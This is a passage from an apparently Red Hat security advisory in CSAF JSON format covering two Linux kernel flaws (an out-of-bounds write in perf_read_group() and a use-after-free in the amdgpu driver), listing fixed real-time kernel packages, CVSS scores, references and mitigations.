},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2252731"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s Performance Events system component. A condition can be triggered that allows data to be written past the end or before the beginning of the intended memory buffer. This may lead to a system crash, code execution, or local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6931"
},
{
"category": "external",
"summary": "RHBZ#2252731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252731"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6931"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
}
],
"release_date": "2023-11-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "It is not possible to trigger this issue with the default kernel.perf_event_paranoid sysctl value 2. You may check it with:\ncat /proc/sys/kernel/perf_event_paranoid",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size"
},
{
"cve": "CVE-2023-51042",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259866"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Linux kernel\u0027s AMD GPU driver which may allow access to members of a synchronization structure after the structure is freed. This issue could allow a local user to crash the system or to access confidential system memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only applicable to the amdgpu module, which is typically only loaded on systems that use AMD GPU hardware. Use the `lsmod` command to determine whether the amdgpu module is loaded.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-51042"
},
{
"category": "external",
"summary": "RHBZ#2259866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259866"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-51042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51042"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628",
"url": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628"
}
],
"release_date": "2024-01-23T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the amdgpu module from loading. Please see https://access.redhat.com/solutions/41278 for more information on how to prevent kernel modules from loading. Note that if a system has an AMD GPU, this may make certain features of that GPU unavailable.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
